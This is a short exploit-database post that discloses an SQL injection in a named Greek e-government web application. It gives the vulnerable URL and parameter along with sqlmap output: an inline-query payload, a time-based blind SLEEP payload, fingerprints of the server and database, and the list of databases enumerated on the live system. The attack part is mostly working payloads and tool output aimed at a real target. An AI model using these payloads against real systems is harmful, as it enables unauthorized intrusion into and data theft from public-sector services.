Greek e-Government SQL İnjection

2020.06.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Tested On : Kali Linux # Contact : instagram.com/rootayyildiz/ Vlun : https://einventory.e-gif.gov.gr/export_to_json.php?s=test sqlmap identified the following injection point(s) with a total of 434 HTTP(s) requests: --- Parameter: s (GET) Type: inline query Title: Generic inline queries Payload: s=(SELECT CONCAT(CONCAT(0x7176707671,(CASE WHEN (3241=3241) THEN 0x31 ELSE 0x30 END)),0x71786a7071)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: s=(SELECT 2051 FROM (SELECT(SLEEP(5)))iIrq) --- web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 sqlmap resumed the following injection point(s) from stored session: --- Parameter: s (GET) Type: inline query Title: Generic inline queries Payload: s=(SELECT CONCAT(CONCAT(0x7176707671,(CASE WHEN (3241=3241) THEN 0x31 ELSE 0x30 END)),0x71786a7071)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: s=(SELECT 2051 FROM (SELECT(SLEEP(5)))iIrq) --- web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.0 available databases [2]: [*] db_einv [*] information_schema


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top